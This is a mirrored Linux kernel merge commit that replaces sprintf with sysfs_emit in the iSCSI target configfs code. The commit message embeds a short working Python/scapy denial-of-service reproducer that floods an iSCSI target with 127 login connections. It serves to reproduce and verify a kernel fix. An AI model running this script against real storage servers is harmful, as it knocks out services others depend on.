mirror of
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
synced 2024-12-29 17:25:38 +00:00
Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c"
Konstantin Shelekhin <k.shelekhin@yadro.com> says: This patch series cleanses iscsi_target_configfs.c of sprintf usage. The first patch fixes the real problem, the second just makes sure we are on the safe side from now on. I've reproduced the issue fixed in the first patch by utilizing this cool thing: https://git.sr.ht/~kshelekhin/scapy-iscsi Yeah, shameless promoting of my own tools, but I like the simplicity of scapy and writing tests in C with libiscsi can be a little cumbersome. Check it out: #!/usr/bin/env python3 # Let's cause some DoS in iSCSI target import sys from scapy.supersocket import StreamSocket from scapy_iscsi.iscsi import * cpr = { "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59", "TargetName": "iqn.2023-07.com.example:target", "HeaderDigest": "None", "DataDigest": "None", } spr = { "SessionType": "Normal", "ErrorRecoveryLevel": 0, "DefaultTime2Retain": 0, "DefaultTime2Wait": 2, "ImmediateData": "Yes", "FirstBurstLength": 65536, "MaxBurstLength": 262144, "MaxRecvDataSegmentLength": 262144, "MaxOutstandingR2T": 1, } if len(sys.argv) != 3: print("usage: dos.py <host> <port>", file=sys.stderr) exit(1) host = sys.argv[1] port = int(sys.argv[2]) isid = 0xB00B tsih = 0 connections = [] for i in range(0, 127): s = socket.socket() s.connect((host, port)) s = StreamSocket(s, ISCSI) ds = cpr if i > 0 else cpr | spr lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds)) lirs = s.sr1(lirq) tsih = lirs.tsih connections.append(s) input() Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
This commit is contained in:
commit
31799f9e6a
@ -45,9 +45,9 @@ static ssize_t lio_target_np_driver_show(struct config_item *item, char *page,
|
||||
|
||||
tpg_np_new = iscsit_tpg_locate_child_np(tpg_np, type);
|
||||
if (tpg_np_new)
|
||||
rb = sprintf(page, "1\n");
|
||||
rb = sysfs_emit(page, "1\n");
|
||||
else
|
||||
rb = sprintf(page, "0\n");
|
||||
rb = sysfs_emit(page, "0\n");
|
||||
|
||||
return rb;
|
||||
}
|
||||
@ -282,7 +282,7 @@ static ssize_t iscsi_nacl_attrib_##name##_show(struct config_item *item,\
|
||||
{ \
|
||||
struct se_node_acl *se_nacl = attrib_to_nacl(item); \
|
||||
struct iscsi_node_acl *nacl = to_iscsi_nacl(se_nacl); \
|
||||
return sprintf(page, "%u\n", nacl->node_attrib.name); \
|
||||
return sysfs_emit(page, "%u\n", nacl->node_attrib.name); \
|
||||
} \
|
||||
\
|
||||
static ssize_t iscsi_nacl_attrib_##name##_store(struct config_item *item,\
|
||||
@ -320,7 +320,7 @@ static ssize_t iscsi_nacl_attrib_authentication_show(struct config_item *item,
|
||||
struct se_node_acl *se_nacl = attrib_to_nacl(item);
|
||||
struct iscsi_node_acl *nacl = to_iscsi_nacl(se_nacl);
|
||||
|
||||
return sprintf(page, "%d\n", nacl->node_attrib.authentication);
|
||||
return sysfs_emit(page, "%d\n", nacl->node_attrib.authentication);
|
||||
}
|
||||
|
||||
static ssize_t iscsi_nacl_attrib_authentication_store(struct config_item *item,
|
||||
@ -533,102 +533,102 @@ static ssize_t lio_target_nacl_info_show(struct config_item *item, char *page)
|
||||
spin_lock_bh(&se_nacl->nacl_sess_lock);
|
||||
se_sess = se_nacl->nacl_sess;
|
||||
if (!se_sess) {
|
||||
rb += sprintf(page+rb, "No active iSCSI Session for Initiator"
|
||||
rb += sysfs_emit_at(page, rb, "No active iSCSI Session for Initiator"
|
||||
" Endpoint: %s\n", se_nacl->initiatorname);
|
||||
} else {
|
||||
sess = se_sess->fabric_sess_ptr;
|
||||
|
||||
rb += sprintf(page+rb, "InitiatorName: %s\n",
|
||||
rb += sysfs_emit_at(page, rb, "InitiatorName: %s\n",
|
||||
sess->sess_ops->InitiatorName);
|
||||
rb += sprintf(page+rb, "InitiatorAlias: %s\n",
|
||||
rb += sysfs_emit_at(page, rb, "InitiatorAlias: %s\n",
|
||||
sess->sess_ops->InitiatorAlias);
|
||||
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"LIO Session ID: %u ISID: 0x%6ph TSIH: %hu ",
|
||||
sess->sid, sess->isid, sess->tsih);
|
||||
rb += sprintf(page+rb, "SessionType: %s\n",
|
||||
rb += sysfs_emit_at(page, rb, "SessionType: %s\n",
|
||||
(sess->sess_ops->SessionType) ?
|
||||
"Discovery" : "Normal");
|
||||
rb += sprintf(page+rb, "Session State: ");
|
||||
rb += sysfs_emit_at(page, rb, "Session State: ");
|
||||
switch (sess->session_state) {
|
||||
case TARG_SESS_STATE_FREE:
|
||||
rb += sprintf(page+rb, "TARG_SESS_FREE\n");
|
||||
rb += sysfs_emit_at(page, rb, "TARG_SESS_FREE\n");
|
||||
break;
|
||||
case TARG_SESS_STATE_ACTIVE:
|
||||
rb += sprintf(page+rb, "TARG_SESS_STATE_ACTIVE\n");
|
||||
rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_ACTIVE\n");
|
||||
break;
|
||||
case TARG_SESS_STATE_LOGGED_IN:
|
||||
rb += sprintf(page+rb, "TARG_SESS_STATE_LOGGED_IN\n");
|
||||
rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_LOGGED_IN\n");
|
||||
break;
|
||||
case TARG_SESS_STATE_FAILED:
|
||||
rb += sprintf(page+rb, "TARG_SESS_STATE_FAILED\n");
|
||||
rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_FAILED\n");
|
||||
break;
|
||||
case TARG_SESS_STATE_IN_CONTINUE:
|
||||
rb += sprintf(page+rb, "TARG_SESS_STATE_IN_CONTINUE\n");
|
||||
rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_IN_CONTINUE\n");
|
||||
break;
|
||||
default:
|
||||
rb += sprintf(page+rb, "ERROR: Unknown Session"
|
||||
rb += sysfs_emit_at(page, rb, "ERROR: Unknown Session"
|
||||
" State!\n");
|
||||
break;
|
||||
}
|
||||
|
||||
rb += sprintf(page+rb, "---------------------[iSCSI Session"
|
||||
rb += sysfs_emit_at(page, rb, "---------------------[iSCSI Session"
|
||||
" Values]-----------------------\n");
|
||||
rb += sprintf(page+rb, " CmdSN/WR : CmdSN/WC : ExpCmdSN"
|
||||
rb += sysfs_emit_at(page, rb, " CmdSN/WR : CmdSN/WC : ExpCmdSN"
|
||||
" : MaxCmdSN : ITT : TTT\n");
|
||||
max_cmd_sn = (u32) atomic_read(&sess->max_cmd_sn);
|
||||
rb += sprintf(page+rb, " 0x%08x 0x%08x 0x%08x 0x%08x"
|
||||
rb += sysfs_emit_at(page, rb, " 0x%08x 0x%08x 0x%08x 0x%08x"
|
||||
" 0x%08x 0x%08x\n",
|
||||
sess->cmdsn_window,
|
||||
(max_cmd_sn - sess->exp_cmd_sn) + 1,
|
||||
sess->exp_cmd_sn, max_cmd_sn,
|
||||
sess->init_task_tag, sess->targ_xfer_tag);
|
||||
rb += sprintf(page+rb, "----------------------[iSCSI"
|
||||
rb += sysfs_emit_at(page, rb, "----------------------[iSCSI"
|
||||
" Connections]-------------------------\n");
|
||||
|
||||
spin_lock(&sess->conn_lock);
|
||||
list_for_each_entry(conn, &sess->sess_conn_list, conn_list) {
|
||||
rb += sprintf(page+rb, "CID: %hu Connection"
|
||||
rb += sysfs_emit_at(page, rb, "CID: %hu Connection"
|
||||
" State: ", conn->cid);
|
||||
switch (conn->conn_state) {
|
||||
case TARG_CONN_STATE_FREE:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_FREE\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_XPT_UP:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_XPT_UP\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_IN_LOGIN:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_IN_LOGIN\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_LOGGED_IN:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_LOGGED_IN\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_IN_LOGOUT:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_IN_LOGOUT\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_LOGOUT_REQUESTED:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_LOGOUT_REQUESTED\n");
|
||||
break;
|
||||
case TARG_CONN_STATE_CLEANUP_WAIT:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"TARG_CONN_STATE_CLEANUP_WAIT\n");
|
||||
break;
|
||||
default:
|
||||
rb += sprintf(page+rb,
|
||||
rb += sysfs_emit_at(page, rb,
|
||||
"ERROR: Unknown Connection State!\n");
|
||||
break;
|
||||
}
|
||||
|
||||
rb += sprintf(page+rb, " Address %pISc %s", &conn->login_sockaddr,
|
||||
rb += sysfs_emit_at(page, rb, " Address %pISc %s", &conn->login_sockaddr,
|
||||
(conn->network_transport == ISCSI_TCP) ?
|
||||
"TCP" : "SCTP");
|
||||
rb += sprintf(page+rb, " StatSN: 0x%08x\n",
|
||||
rb += sysfs_emit_at(page, rb, " StatSN: 0x%08x\n",
|
||||
conn->stat_sn);
|
||||
}
|
||||
spin_unlock(&sess->conn_lock);
|
||||
@ -641,7 +641,7 @@ static ssize_t lio_target_nacl_info_show(struct config_item *item, char *page)
|
||||
static ssize_t lio_target_nacl_cmdsn_depth_show(struct config_item *item,
|
||||
char *page)
|
||||
{
|
||||
return sprintf(page, "%u\n", acl_to_nacl(item)->queue_depth);
|
||||
return sysfs_emit(page, "%u\n", acl_to_nacl(item)->queue_depth);
|
||||
}
|
||||
|
||||
static ssize_t lio_target_nacl_cmdsn_depth_store(struct config_item *item,
|
||||
@ -750,7 +750,7 @@ static ssize_t iscsi_tpg_attrib_##name##_show(struct config_item *item, \
|
||||
if (iscsit_get_tpg(tpg) < 0) \
|
||||
return -EINVAL; \
|
||||
\
|
||||
rb = sprintf(page, "%u\n", tpg->tpg_attrib.name); \
|
||||
rb = sysfs_emit(page, "%u\n", tpg->tpg_attrib.name); \
|
||||
iscsit_put_tpg(tpg); \
|
||||
return rb; \
|
||||
} \
|
||||
@ -1136,7 +1136,7 @@ static void lio_target_tiqn_deltpg(struct se_portal_group *se_tpg)
|
||||
static ssize_t lio_target_wwn_lio_version_show(struct config_item *item,
|
||||
char *page)
|
||||
{
|
||||
return sprintf(page, "Datera Inc. iSCSI Target "ISCSIT_VERSION"\n");
|
||||
return sysfs_emit(page, "Datera Inc. iSCSI Target %s\n", ISCSIT_VERSION);
|
||||
}
|
||||
|
||||
CONFIGFS_ATTR_RO(lio_target_wwn_, lio_version);
|
||||
@ -1144,7 +1144,7 @@ CONFIGFS_ATTR_RO(lio_target_wwn_, lio_version);
|
||||
static ssize_t lio_target_wwn_cpus_allowed_list_show(
|
||||
struct config_item *item, char *page)
|
||||
{
|
||||
return sprintf(page, "%*pbl\n",
|
||||
return sysfs_emit(page, "%*pbl\n",
|
||||
cpumask_pr_args(iscsit_global->allowed_cpumask));
|
||||
}
|
||||
|
||||
@ -1281,7 +1281,7 @@ static ssize_t iscsi_disc_enforce_discovery_auth_show(struct config_item *item,
|
||||
{
|
||||
struct iscsi_node_auth *discovery_auth = &iscsit_global->discovery_acl.node_auth;
|
||||
|
||||
return sprintf(page, "%d\n", discovery_auth->enforce_discovery_auth);
|
||||
return sysfs_emit(page, "%d\n", discovery_auth->enforce_discovery_auth);
|
||||
}
|
||||
|
||||
static ssize_t iscsi_disc_enforce_discovery_auth_store(struct config_item *item,
|
||||
|
Loading…
Reference in New Issue
Block a user